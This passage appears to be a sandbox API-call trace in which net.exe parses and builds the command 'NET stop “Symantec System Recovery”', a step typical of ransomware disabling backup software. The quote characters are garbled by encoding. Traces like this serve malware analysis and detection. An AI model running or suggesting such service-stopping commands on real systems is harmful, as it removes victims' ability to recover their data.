_String2="RecoveryΓÇ¥") returned 1 [0040.036] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0040.036] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.036] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0040.036] _wcsicmp (_String1="RDR", _String2="ΓÇ£Symantec") returned -833 [0040.036] _wcsicmp (_String1="RDR", _String2="System") returned -1 [0040.036] _wcsicmp (_String1="RDR", _String2="RecoveryΓÇ¥") returned -1 [0040.036] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0040.036] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.036] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0040.036] _wcsicmp (_String1="WORK", _String2="ΓÇ£Symantec") returned -828 [0040.036] _wcsicmp (_String1="WORK", _String2="System") returned 4 [0040.037] _wcsicmp (_String1="WORK", _String2="RecoveryΓÇ¥") returned 5 [0040.037] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0040.037] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.037] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0040.037] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Symantec") returned -828 [0040.037] _wcsicmp (_String1="WKSTA", _String2="System") returned 4 [0040.037] _wcsicmp (_String1="WKSTA", _String2="RecoveryΓÇ¥") returned 5 [0040.037] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0040.037] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.037] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0040.037] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Symantec") returned -835 [0040.037] _wcsicmp (_String1="PRDR", _String2="System") returned -3 [0040.037] _wcsicmp (_String1="PRDR", _String2="RecoveryΓÇ¥") returned -2 [0040.037] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0040.037] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.037] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0040.037] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Symantec") returned -847 [0040.037] _wcsicmp (_String1="DEVRDR", _String2="System") returned -15 [0040.037] _wcsicmp (_String1="DEVRDR", _String2="RecoveryΓÇ¥") returned -14 [0040.037] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.037] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0040.037] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.037] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0040.037] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.037] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0040.037] _wcsicmp (_String1="SVR", _String2="ΓÇ£Symantec") returned -832 [0040.037] _wcsicmp (_String1="SVR", _String2="System") returned -3 [0040.037] _wcsicmp (_String1="SVR", _String2="RecoveryΓÇ¥") returned 1 [0040.037] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0040.037] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.037] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0040.037] _wcsicmp (_String1="SRV", _String2="ΓÇ£Symantec") returned -832 [0040.037] _wcsicmp (_String1="SRV", _String2="System") returned -7 [0040.037] _wcsicmp (_String1="SRV", _String2="RecoveryΓÇ¥") returned 1 [0040.038] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.038] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0xdf6fc, nSize=0x0, Arguments=0xdf6f8 | out: lpBuffer="㼨&ꔺ瓡") returned 0x1c [0040.038] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0040.038] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0040.038] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0040.038] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0040.038] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.038] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0040.038] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0040.038] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.038] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0040.038] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.038] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0040.038] wcscpy_s (in: _Destination=0xfda4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0040.038] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0040.039] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xfdb338, nSize=0x800, Arguments=0xfd9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0040.039] GetFileType (hFile=0x26c) returned 0x3 [0040.039] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x2641f8 [0040.039] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x2641f8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0040.039] WriteFile (in: hFile=0x26c, lpBuffer=0x2641f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0xdf6dc, lpOverlapped=0x0 | out: lpBuffer=0x2641f8*, lpNumberOfBytesWritten=0xdf6dc*=0x20, lpOverlapped=0x0) returned 1 [0040.039] LocalFree (hMem=0x2641f8) returned 0x0 [0040.039] GetFileType (hFile=0x26c) returned 0x3 [0040.039] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x263d88 [0040.039] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x263d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n&", lpUsedDefaultChar=0x0) returned 2 [0040.040] WriteFile (in: hFile=0x26c, lpBuffer=0x263d88*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf6dc, lpOverlapped=0x0 | out: lpBuffer=0x263d88*, lpNumberOfBytesWritten=0xdf6dc*=0x2, lpOverlapped=0x0) returned 1 [0040.040] LocalFree (hMem=0x263d88) returned 0x0 [0040.040] wcscpy_s (in: _Destination=0xdf794, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Symantec", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Symantec") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET stop ΓÇ£Symantec", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Symantec ") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET stop ΓÇ£Symantec ", _SizeInWords=0x200, _Source="System", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Symantec System") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET stop ΓÇ£Symantec System", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Symantec System ") returned 0x0 [0040.040] wcsncat_s (in: _Destination="NET stop ΓÇ£Symantec System ", _SizeInWords=0x200, _Source="RecoveryΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Symantec System RecoveryΓÇ¥") returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&댸ý\rѰýɬ") returned 0xad [0040.040] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | ", _MaxCount=0x27) returned 18 [0040.040] LocalFree (hMem=0x265860) returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x2e [0040.040] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /D", _MaxCount=0x27) returned 16 [0040.040] LocalFree (hMem=0x263f70) returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x7d [0040.040] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:tim", _MaxCount=0x27) returned 16 [0040.040] LocalFree (hMem=0x265860) returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x26 [0040.040] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x27) returned 16 [0040.040] LocalFree (hMem=0x263f70) returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.040] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x27) returned 16 [0040.040] LocalFree (hMem=0x263f70) returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x1b [0040.040] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x27) returned 13 [0040.040] LocalFree (hMem=0x263f70) returned 0x0 [0040.040] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0xbe [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]", _MaxCount=0x27) returned 12 [0040.041] LocalFree (hMem=0x265860) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x33 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET comma", _MaxCount=0x27) returned 11 [0040.041] LocalFree (hMem=0x263f70) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x27) returned 11 [0040.041] LocalFree (hMem=0x263f70) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0xc1 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"t", _MaxCount=0x27) returned 7 [0040.041] LocalFree (hMem=0x265860) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x16 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x27) returned 3 [0040.041] LocalFree (hMem=0x263f70) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x33 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE]", _MaxCount=0x27) returned 15 [0040.041] LocalFree (hMem=0x263f70) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x234 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharena", _MaxCount=0x27) returned 12 [0040.041] LocalFree (hMem=0x265860) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x13 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x27) returned 14 [0040.041] LocalFree (hMem=0x263f70) returned 0x0 [0040.041] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.041] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x27) returned 14 [0040.041] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x16 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x11 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x12 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0xf [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x17 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x18 [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x2a [0040.042] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r", _MaxCount=0x27) returned 14 [0040.042] LocalFree (hMem=0x263f70) returned 0x0 [0040.042] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x27) returned 19 [0040.043] LocalFree (hMem=0x263f70) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x58 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:", _MaxCount=0x27) returned -1 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x184 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computerna", _MaxCount=0x27) returned -2 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xc7 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET USER\r\n[username [password | *] [opt", _MaxCount=0x27) returned -2 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x47 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/", _MaxCount=0x27) returned -3 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xc2 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG", _MaxCount=0x27) returned 19 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x319 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="SERVICES\r\nNET START can be used to star", _MaxCount=0x27) returned -5 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x483 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="SYNTAX\r\nThe following conventions are u", _MaxCount=0x27) returned -5 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xa86 [0040.043] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="NAMES\r\nThe following types of names are", _MaxCount=0x27) returned 4 [0040.043] LocalFree (hMem=0x265860) returned 0x0 [0040.043] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x54 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System RecoveryΓÇ¥", _String2="\r\nFor more information on tools see the", _MaxCount=0x27) returned 97 [0040.044] LocalFree (hMem=0x265860) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xad [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF", _MaxCount=0x1b) returned 18 [0040.044] LocalFree (hMem=0x265860) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x2e [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET COMPUTER\r\n\\\\computernam", _MaxCount=0x1b) returned 16 [0040.044] LocalFree (hMem=0x263f70) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x7d [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET CONFIG SERVER\r\n[/AUTODI", _MaxCount=0x1b) returned 16 [0040.044] LocalFree (hMem=0x265860) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x26 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET CONFIG\r\n[SERVER | WORKS", _MaxCount=0x1b) returned 16 [0040.044] LocalFree (hMem=0x263f70) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc08, dwLanguageId=0x0, 